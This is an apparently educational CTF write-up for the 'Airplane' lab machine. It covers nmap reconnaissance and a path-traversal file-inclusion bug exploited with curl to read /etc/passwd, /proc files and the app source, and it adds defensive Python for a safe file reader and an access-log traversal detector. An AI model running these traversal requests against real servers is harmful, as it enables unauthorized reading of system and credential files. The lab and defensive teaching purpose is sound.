Airplane

Are you ready to fly?


Last updated 11 months ago

This work by Manav G Krishna is licensed under

Machine IP: 10.10.116.253

Nmap Scan:

nmap -p- -A -v --min-rate 100 -oN airplane_thm -Pn 10.10.116.253

Nmap scan report for 10.10.116.253
Host is up (0.20s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b8:64:f7:a9:df:29:3a:b5:8a:58:ff:84:7c:1f:1a:b7 (RSA)
|   256 ad:61:3e:c7:10:32:aa:f1:f2:28:e2:de:cf:84:de:f0 (ECDSA)
|_  256 a9:d8:49:aa:ee:de:c4:48:32:e4:f1:9e:2a:8a:67:f0 (ED25519)
6048/tcp open  x11?
8000/tcp open  http-alt Werkzeug/3.0.2 Python/3.8.10
|_http-server-header: Werkzeug/3.0.2 Python/3.8.10
|_http-title: Did not follow redirect to http://airplane.thm:8000/?page=index.html
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/3.0.2 Python/3.8.10
|     Date: Fri, 07 Jun 2024 18:35:44 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/3.0.2 Python/3.8.10
|     Date: Fri, 07 Jun 2024 18:35:39 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 269
|     Location: http://airplane.thm:8000/?page=index.html
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://airplane.thm:8000/?page=index.html">http://airplane.thm:8000/?page=index.html</a>. If not, click the link.
|   Socks5: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('
|     ').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 17.468 days (since Tue May 21 12:54:49 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   160.98 ms 10.11.0.1
2   161.10 ms 10.10.116.253

From the scan, we can see that ports 22, 6048, and 8000 are open. The http-title line also reveals a domain name, airplane.thm.

Hosts file entry: echo '10.10.116.253 airplane.thm' | sudo tee -a /etc/hosts

Checking out port 6048:

The Nmap scan suggests that the service running on this port might be X11. It is not certain, which is why Nmap prints a question mark (x11?). Let us check out resources for pentesting this service anyway.

Ports 6000-6063 are where we typically find the X11 service:

SpeedGuide also mentions: Known Unauthorized Use on port 6003.

Pentesting X11:

HackTricks mentions that we can check whether the X11 port accepts anonymous connections. From the information we got from SpeedGuide, only port 6003 has been identified as being susceptible to unauthorized access, and in our case X11 might be running on port 6048. We can still test for an anonymous connection with the scanner auxiliary module in Metasploit and see what we get.

This shows we can't connect anonymously to port 6048. This is pretty much a dead end for now. HackTricks didn't have anything else that was worth testing for X11.

Now we can look at port 8000.

Checking out port 8000:

From the Nmap scan we can see that the server running on this port is a Python web server using Werkzeug.

We can do some directory busting:

Command:

dirsearch -u http://airplane.thm:8000 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

There is a path named /airplane. Checking it out:

Nothing interesting here.

Upon browsing http://airplane.thm:8000 we are redirected to http://airplane.thm:8000/?page=index.html.

There is a parameter in the URL named page (?page=) and the first thing that comes to mind is LFI (Local File Inclusion).

We can now try to climb the directory tree to fetch files such as /etc/passwd. Doing it from the terminal is a lot easier:

Command:

curl --output - http://airplane.thm:8000/\?page\=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hudson:x:1001:1001::/home/hudson:/bin/bash
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin

We indeed have successful LFI.
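The fix for this class of bug is to resolve the requested path and reject anything that lands outside the directory being served. The following is an added example, not the room's app.py and not code from this writeup; the function names, the directory layout and the secret.txt file are hypothetical and constructed for the demonstration. It runs a naive handler and a confined one over the same four requests.

```python
import os
import tempfile
from pathlib import Path


def read_page_vulnerable(web_root: str, page: str) -> bytes:
    """Naive pattern: join the user-supplied name onto the web root and open it.

    os.path.join keeps '..' segments, and an absolute `page` replaces
    web_root entirely, so any file the process can read is served.
    """
    with open(os.path.join(web_root, page), "rb") as fh:
        return fh.read()


def read_page_confined(web_root: str, page: str) -> bytes:
    """Resolve the requested path first, then refuse anything outside web_root."""
    root = Path(web_root).resolve()
    # resolve() collapses '..' and follows symlinks, so the containment check
    # runs on the path that would actually be opened.
    candidate = (root / page).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        raise PermissionError(f"page escapes web root: {page!r}") from None
    if not candidate.is_file():
        raise FileNotFoundError(page)
    return candidate.read_bytes()


def outcome(handler, web_root: Path, page: str) -> str:
    """Return the served text, or the name of the exception that blocked it."""
    try:
        return handler(str(web_root), page).decode()
    except (PermissionError, FileNotFoundError) as exc:
        return type(exc).__name__


def demo() -> dict:
    """Run both handlers over the same requests in a throwaway directory tree."""
    with tempfile.TemporaryDirectory() as tmp:
        web_root = Path(tmp) / "app" / "static"
        web_root.mkdir(parents=True)
        (web_root / "index.html").write_text("<h1>home</h1>")
        # Constructed stand-in for a sensitive file outside the web root.
        secret = Path(tmp) / "app" / "secret.txt"
        secret.write_text("not for the web")
        # A symlink inside the web root that points outside it.
        os.symlink(secret, web_root / "link.html")

        requests = {
            "plain": "index.html",
            "dotdot": "../secret.txt",
            "absolute": str(secret),
            "symlink": "link.html",
        }
        return {
            label: (outcome(read_page_vulnerable, web_root, page),
                    outcome(read_page_confined, web_root, page))
            for label, page in requests.items()
        }


if __name__ == "__main__":
    for label, (naive, confined) in demo().items():
        print(f"{label:9} naive={naive!r:20} confined={confined!r}")
```

In a Flask/Werkzeug application, `werkzeug.security.safe_join` and `flask.send_from_directory` perform a comparable join-and-reject check for `..` segments and absolute paths.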

From the /etc/passwd contents, two users other than root have a login shell: hudson and carlos. Trying to fetch the SSH private key (id_rsa) of these users, the user.txt flag, etc. didn't yield any results.
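On the detection side, requests like the ones above stand out in the web server's access log once the page value is decoded and walked segment by segment. The following is an added example, not part of the original writeup: the log lines are constructed (addresses, timestamps and status codes are made up), and the log format and the names classify_page, scan and summarise are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines: client addresses, timestamps and statuses are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jun/2024 18:35:39] "GET / HTTP/1.1" 302 -',
    '192.0.2.10 - - [07/Jun/2024 18:35:40] "GET /?page=index.html HTTP/1.1" 200 -',
    '192.0.2.10 - - [07/Jun/2024 18:36:02] "GET /?page=img/../index.html HTTP/1.1" 200 -',
    '192.0.2.44 - - [07/Jun/2024 18:41:02] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 -',
    '192.0.2.44 - - [07/Jun/2024 18:41:09] "GET /?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 -',
    '192.0.2.44 - - [07/Jun/2024 18:41:30] "GET /?page=../../../../home/carlos/.ssh/id_rsa HTTP/1.1" 404 -',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)


def classify_page(value: str) -> str:
    """Classify one ?page= value as 'ok', 'traversal' or 'absolute'."""
    # Decode once more so an encoded separator is judged like a plain one,
    # whether or not the query string was already decoded by the caller.
    decoded = unquote(value).replace("\\", "/")
    if decoded.startswith("/"):
        return "absolute"
    depth = 0
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:  # climbed above the directory being served
                return "traversal"
        else:
            depth += 1
    return "ok"


def scan(lines):
    """Return one finding per request that carries a page parameter."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for value in parse_qs(query, keep_blank_values=True).get("page", []):
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "page": value,
                "status": int(m["status"]),
                "verdict": classify_page(value),
            })
    return findings


def summarise(findings):
    """Per client: escaping requests made, and how many were answered with 200."""
    per_ip = defaultdict(lambda: {"attempts": 0, "served": 0})
    for f in findings:
        if f["verdict"] == "ok":
            continue
        per_ip[f["ip"]]["attempts"] += 1
        if f["status"] == 200:
            per_ip[f["ip"]]["served"] += 1
    return dict(per_ip)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], f["verdict"], f["page"])
    print(summarise(scan(SAMPLE_LOG)))
```

A flagged request answered with 200 means file content left the server, so those are the lines to triage first.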

Now let us try to fetch some files from the /proc file system (It provides detailed information about kernel, processes, and configuration parameters in a structured manner under the /proc directory):

  1. /proc/self/cmdline: It is a file that contains the command line arguments that were used to start the current process.

Command:

curl --output - http://airplane.thm:8000/\?page\=../../../../proc/self/cmdline

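It outputs /usr/bin/python3app.py. The arguments in cmdline are separated by NUL bytes that the terminal does not display, so this is /usr/bin/python3 followed by app.py, which shows that the current process is running app.py.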

We can now try to fetch the app.py file:

Command:

curl --output - http://airplane.thm:8000/\?page\=../app.py

There is nothing of interest in here.

  2. /proc/sched_debug: This file can be used to list running processes. It provides information about the state of the Linux scheduler.

Command:

curl --output - http://airplane.thm:8000/\?page\=../../../../proc/sched_debug
Sched Debug Version: v0.11, 5.4.0-139-generic #156-Ubuntu
ktime                                   : 643026.363157
sched_clk                               : 643036.796476
cpu_clk                                 : 643029.398816
jiffies                                 : 4295053041
sched_clock_stable()                    : 1

sysctl_sched
  .sysctl_sched_latency                    : 12.000000
  .sysctl_sched_min_granularity            : 1.500000
  .sysctl_sched_wakeup_granularity         : 2.000000
  .sysctl_sched_child_runs_first           : 0
  .sysctl_sched_features                   : 2042683
  .sysctl_sched_tunable_scaling            : 1 (logarithmic)

cpu#0, 2499.998 MHz
  .nr_running                    : 1
  .nr_switches                   : 145394
  .nr_load_updates               : 0
  .nr_uninterruptible            : -15
  .next_balance                  : 4295.053041
  .curr->pid                     : 1191
  .clock                         : 643028.641740
  .clock_task                    : 643028.641740
  .avg_idle                      : 893338
  .max_idle_balance_cost         : 500000

cfs_rq[0]:/autogroup-103
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 4.659338
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -15767.298259
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 642576.238699
  .se->vruntime                  : 15766.000671
  .se->sum_exec_runtime          : 2.423764
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-75
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 118.480460
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -15653.477137
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 1024
  .runnable_load_avg             : 1024
  .util_avg                      : 512
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 1024
  .tg_load_avg                   : 1024
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 643028.641740
  .se->vruntime                  : 15766.092635
  .se->sum_exec_runtime          : 117.283029
  .se->load.weight               : 1048576
  .se->runnable_weight           : 1048576
  .se->avg.load_avg              : 1020
  .se->avg.util_avg              : 512
  .se->avg.runnable_load_avg     : 1020

cfs_rq[0]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 15771.957597
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 0.000000
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 1020
  .runnable_load_avg             : 1020
  .util_avg                      : 512
  .util_est_enqueued             : 513
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[0]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.000000
  .rt_runtime                    : 950.000000

dl_rq[0]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 I         rcu_gp     3         7.951420         2   100         0.000000         0.000000         0.000000 0 0 /
 I     rcu_par_gp     4         9.951419         2   100         0.000000         0.000000         0.000000 0 0 /
 I   kworker/0:0H     6       576.469184         4   100         0.000000         0.032862         0.000000 0 0 /
 I   kworker/u4:0     7     13329.010579       455   120         0.000000        16.805936         0.000000 0 0 /
 I   mm_percpu_wq     8        16.019073         2   100         0.000000         0.000000         0.000000 0 0 /
 S    ksoftirqd/0     9     15656.083264       845   120         0.000000       198.588077         0.000000 0 0 /
 S    migration/0    11        22.019070       248     0         0.000000         3.600801         0.000000 0 0 /
 S  idle_inject/0    12         0.000000         3    49         0.000000         0.000000         0.000000 0 0 /
 I    kworker/0:1    13     10173.535527      1044   120         0.000000        42.520695         0.000000 0 0 /
 S        cpuhp/0    14       775.339778        11   120         0.000000         0.282868         0.000000 0 0 /
 S     oom_reaper    27        49.019055         2   120         0.000000         0.000000         0.000000 0 0 /
 I      writeback    28        49.019055         2   100         0.000000         0.000000         0.000000 0 0 /
 S           ksmd    30        51.019053         2   125         0.000000         0.000000         0.000000 0 0 /
 I    kintegrityd    77        57.914847         2   100         0.000000         0.000000         0.000000 0 0 /
 I blkcg_punt_bio    79        57.914847         2   100         0.000000         0.000000         0.000000 0 0 /
 I        ata_sff    81        58.058834         2   100         0.000000         0.000000         0.000000 0 0 /
 I    edac-poller    83        58.064044         2   100         0.000000         0.000000         0.000000 0 0 /
 S      watchdogd    85         5.999997         2     0         0.000000         0.000000         0.000000 0 0 /
 Iacpi_thermal_pm    92        81.546320         2   100         0.000000         0.023792         0.000000 0 0 /
 Ivfio-irqfd-clea    93        87.560759         2   100         0.000000         0.016218         0.000000 0 0 /
 I          kstrp   103       144.308544         2   100         0.000000         0.014149         0.000000 0 0 /
 Icharger_manager   120       231.333397         2   100         0.000000         0.013072         0.000000 0 0 /
 I   kworker/u4:2   159     15765.985416       314   120         0.000000        10.876708         0.000000 0 0 /
 Iext4-rsv-conver   182       520.732899         2   100         0.000000         0.013890         0.000000 0 0 /
 I   kworker/0:1H   195     15745.578681       241   100         0.000000         2.020911         0.000000 0 0 /
 I    kworker/0:3   251     15766.674391      2325   120         0.000000        54.519100         0.000000 0 0 /
 S  systemd-udevd   262       926.247795      2705   120         0.000000      1656.840932         0.000000 0 0 /autogroup-22
 S          loop0   263      2048.701580         7   100         0.000000         0.081773         0.000000 0 0 /
 S          loop2   266      5234.758513        77   100         0.000000         1.051606         0.000000 0 0 /
 S          loop3   267      9515.960645       160   100         0.000000         9.817005         0.000000 0 0 /
 S          loop5   269      5234.758504        95   100         0.000000         1.580124         0.000000 0 0 /
 Ssystemd-timesyn   299        98.458179        92   120         0.000000       105.387526         0.000000 0 0 /autogroup-30
 S     sd-resolve   305        96.548621        14   120         0.000000         2.602234         0.000000 0 0 /autogroup-30
 Ssystemd-resolve   303        18.153143       158   120         0.000000       120.435021         0.000000 0 0 /autogroup-32
 I         cryptd   332      2135.784467         2   100         0.000000         0.008300         0.000000 0 0 /
 Saccounts-daemon   365        24.110079       150   120         0.000000        20.448992         0.000000 0 0 /autogroup-35
 S          gmain   429        31.329159       755   120         0.000000        24.976210         0.000000 0 0 /autogroup-35
 S           cron   372         3.278111        23   120         0.000000         5.197933         0.000000 0 0 /autogroup-40
 S    dbus-daemon   375       379.576173      6230   120         0.000000       834.752015         0.000000 0 0 /autogroup-42
 S          gmain   523        30.900772       159   120         0.000000        10.431751         0.000000 0 0 /autogroup-43
 S          gdbus   524        29.116567       382   120         0.000000        15.058144         0.000000 0 0 /autogroup-43
 S        polkitd   386        49.614823       875   120         0.000000       100.095068         0.000000 0 0 /autogroup-52
 S          gdbus   483        47.320322       771   120         0.000000        41.827413         0.000000 0 0 /autogroup-52
 S    in:imuxsock   457        18.486386       627   120         0.000000        22.737789         0.000000 0 0 /autogroup-50
 S      in:imklog   458         9.602643         6   120         0.000000         1.505662         0.000000 0 0 /autogroup-50
 S  rs:main Q:Reg   459        18.495937       625   120         0.000000        18.856878         0.000000 0 0 /autogroup-50
 S          snapd   469      3990.714680     38856   120         0.000000       469.086145         0.000000 0 0 /autogroup-55
 S          snapd   487      3996.608242      8362   120         0.000000      2499.630735         0.000000 0 0 /autogroup-55
 S          snapd   576      3652.070784       239   120         0.000000        46.222254         0.000000 0 0 /autogroup-55
 S          snapd   577      3995.582998      7363   120         0.000000      2153.509279         0.000000 0 0 /autogroup-55
 S          snapd  1006       504.738523         1   120         0.000000         0.084869         0.000000 0 0 /autogroup-55
 S        udisksd   396        41.598891       184   120         0.000000        48.330841         0.000000 0 0 /autogroup-56
 S          gmain   462         8.175916         4   120         0.000000         0.057962         0.000000 0 0 /autogroup-56
 S        cleanup   551        43.422422         7   120         0.000000         0.383982         0.000000 0 0 /autogroup-56
 S wpa_supplicant   399         6.871813       105   120         0.000000        10.243871         0.000000 0 0 /autogroup-58
 S   avahi-daemon   433         4.484454         3   120         0.000000         0.150552         0.000000 0 0 /autogroup-38
 S   ModemManager   518        21.042328       175   120         0.000000        56.427785         0.000000 0 0 /autogroup-70
 S          gmain   540        11.660073         2   120         0.000000         0.054628         0.000000 0 0 /autogroup-70
 S          gdbus   562        21.893807        55   120         0.000000         5.296438         0.000000 0 0 /autogroup-70
 S      gdbserver   529         4.507783        28   120         0.000000         6.645510         0.000000 0 0 /autogroup-74
>R        python3  1191       118.480460         1   120         0.000000         0.135038         0.000000 0 0 /autogroup-75
 Samazon-ssm-agen   600        47.293914       757   120         0.000000        10.483550         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   622        53.251912       481   120         0.000000        39.873305         0.000000 0 0 /autogroup-81
 S       whoopsie   557        12.093363        48   120         0.000000        14.585748         0.000000 0 0 /autogroup-84
 S          gdbus   573        13.844009        32   120         0.000000         3.465150         0.000000 0 0 /autogroup-84
 S           gdm3   644        68.782791       114   120         0.000000        23.860067         0.000000 0 0 /autogroup-95
 S          gdbus   657        68.887483       192   120         0.000000         9.339251         0.000000 0 0 /autogroup-95
 S   rtkit-daemon   680         4.659338       140   120         0.000000         4.085816         0.000000 0 0 /autogroup-103
 S          gdbus   714        54.991941       101   120         0.000000         4.974203         0.000000 0 0 /autogroup-95
 S         agetty   721        -2.984186        10   120         0.000000         4.314288         0.000000 0 0 /autogroup-107
 S  gdm-x-session   727       128.878531        32   120         0.000000         8.796583         0.000000 0 0 /autogroup-105
 S          gmain   730       127.187166         5   120         0.000000         0.121225         0.000000 0 0 /autogroup-105
 S          gdbus   738       127.014022        18   120         0.000000         1.231093         0.000000 0 0 /autogroup-105
 S           Xorg   731      2382.425366      3045   120         0.000000       530.953060         0.000000 0 0 /autogroup-105
 Sdbus-run-sessio   740       136.445403         3   120         0.000000         1.505559         0.000000 0 0 /autogroup-105
 S          gmain   763      1171.332031         3   120         0.000000         0.236895         0.000000 0 0 /autogroup-105
 S   dconf worker   767       374.877242        18   120         0.000000         0.963325         0.000000 0 0 /autogroup-105
 S    dbus-daemon   750      1667.093292       115   120         0.000000        10.709076         0.000000 0 0 /autogroup-105
 S          gmain   785      2382.579937       163   120         0.000000        10.590783         0.000000 0 0 /autogroup-105
 S   dconf worker   788       945.627200        93   120         0.000000         3.917499         0.000000 0 0 /autogroup-105
 S     llvmpipe-0   790      2384.422537       614   120         0.000000       678.281802         0.000000 0 0 /autogroup-105
 S      JS Helper   795      2380.681540       147   120         0.000000        23.264097         0.000000 0 0 /autogroup-105
 S      JS Helper   796      2380.808932       144   120         0.000000        64.400907         0.000000 0 0 /autogroup-105
 S    ibus-daemon   811      1134.738527        75   120         0.000000        18.346020         0.000000 0 0 /autogroup-105
 S          gdbus   815      1134.883646        54   120         0.000000         5.684664         0.000000 0 0 /autogroup-105
 S     ibus-dconf   814       852.512278        16   120         0.000000        12.829576         0.000000 0 0 /autogroup-105
 S          gdbus   822       858.078513        12   120         0.000000         0.533468         0.000000 0 0 /autogroup-105
 S   dconf worker   823       858.740608         9   120         0.000000         0.371751         0.000000 0 0 /autogroup-105
 S          gmain   824       864.855220         2   120         0.000000         0.067120         0.000000 0 0 /autogroup-105
 S    ibus-portal   821      1115.854232        64   120         0.000000         7.063153         0.000000 0 0 /autogroup-105
 S          gdbus   831      1115.943688        67   120         0.000000         6.369954         0.000000 0 0 /autogroup-105
 Sat-spi2-registr   827      2341.918442       105   120         0.000000        10.427788         0.000000 0 0 /autogroup-105
 S          gmain   835       905.419600         2   120         0.000000         0.027222         0.000000 0 0 /autogroup-105
 S        upowerd   840        27.640840        85   120         0.000000        53.843959         0.000000 0 0 /autogroup-109
 S          gmain   847        20.399457         4   120         0.000000         0.051108         0.000000 0 0 /autogroup-109
 S          gdbus   848        27.257413        51   120         0.000000         4.424208         0.000000 0 0 /autogroup-109
 S            gjs   859      1613.882310        38   120         0.000000        61.601311         0.000000 0 0 /autogroup-105
 S    gsd-sharing   868      1150.038231        61   120         0.000000        13.210878         0.000000 0 0 /autogroup-105
 S   dconf worker   908      1611.470649        12   120         0.000000         0.384460         0.000000 0 0 /autogroup-105
 S          gdbus   912      1150.112028        60   120         0.000000         5.190680         0.000000 0 0 /autogroup-105
 S          gmain   944      1226.627349         2   120         0.000000         0.046870         0.000000 0 0 /autogroup-105
 S   dconf worker   945      1611.456645        14   120         0.000000         0.381226         0.000000 0 0 /autogroup-105
 S   dconf worker   929      1611.451191        25   120         0.000000         0.739001         0.000000 0 0 /autogroup-105
 S          gmain   900      1072.678199         1   120         0.000000         0.039722         0.000000 0 0 /autogroup-105
 S     gsd-rfkill   874      1150.036648        76   120         0.000000         9.602307         0.000000 0 0 /autogroup-105
 S          gmain   894      1072.340516         1   120         0.000000         0.047320         0.000000 0 0 /autogroup-105
 S          gdbus   895      1150.106270        94   120         0.000000         5.513711         0.000000 0 0 /autogroup-105
 S  gsd-smartcard   875      1150.039898        84   120         0.000000        12.542825         0.000000 0 0 /autogroup-105
 S          gdbus   896      1150.112908        53   120         0.000000         3.900217         0.000000 0 0 /autogroup-105
 S   gsd-datetime   876      1150.039972        66   120         0.000000        27.151397         0.000000 0 0 /autogroup-105
 S          gmain   936      1094.571083         2   120         0.000000         0.063303         0.000000 0 0 /autogroup-105
 S          gdbus   946      1150.108422        56   120         0.000000         2.230710         0.000000 0 0 /autogroup-105
 S          gmain   937      1096.782583         2   120         0.000000         0.059144         0.000000 0 0 /autogroup-105
 S          gdbus   940      1678.019534       118   120         0.000000         8.326697         0.000000 0 0 /autogroup-105
 S          gmain   891      1072.833040         1   120         0.000000         0.039843         0.000000 0 0 /autogroup-105
 Sgsd-a11y-settin   884      1150.037197        53   120         0.000000         7.799463         0.000000 0 0 /autogroup-105
 S          gdbus   890      1150.148199        38   120         0.000000         3.211692         0.000000 0 0 /autogroup-105
 S   dconf worker   925      1082.330483        10   120         0.000000         0.258995         0.000000 0 0 /autogroup-105
 Sgsd-housekeepin   887      2381.590662        95   120         0.000000        16.010553         0.000000 0 0 /autogroup-105
 S          gmain   898      1073.276581         3   120         0.000000         0.983385         0.000000 0 0 /autogroup-105
 S          gmain   931      1084.337674         1   120         0.000000         0.051395         0.000000 0 0 /autogroup-105
 S    gsd-printer   924      1677.905455        65   120         0.000000        19.022057         0.000000 0 0 /autogroup-105
 S          gdbus   962      1677.984285        68   120         0.000000         2.247328         0.000000 0 0 /autogroup-105
 Sibus-engine-sim   941      1108.325927        52   120         0.000000         6.467079         0.000000 0 0 /autogroup-105
 S          gmain   963      1110.591027         1   120         0.000000         0.035722         0.000000 0 0 /autogroup-105
 S          gdbus   964      1111.343121        30   120         0.000000         0.877817         0.000000 0 0 /autogroup-105
 S         colord   965        54.009186       183   120         0.000000       120.477768         0.000000 0 0 /autogroup-114
 S          gdbus   974        30.252733       142   120         0.000000         7.066562         0.000000 0 0 /autogroup-114
 S          sleep  1189       558.153193         3   120         0.000000         0.485092         0.000000 0 0 /autogroup-36

cpu#1, 2499.998 MHz
  .nr_running                    : 0
  .nr_switches                   : 141989
  .nr_load_updates               : 0
  .nr_uninterruptible            : 15
  .next_balance                  : 4295.053017
  .curr->pid                     : 0
  .clock                         : 643028.517425
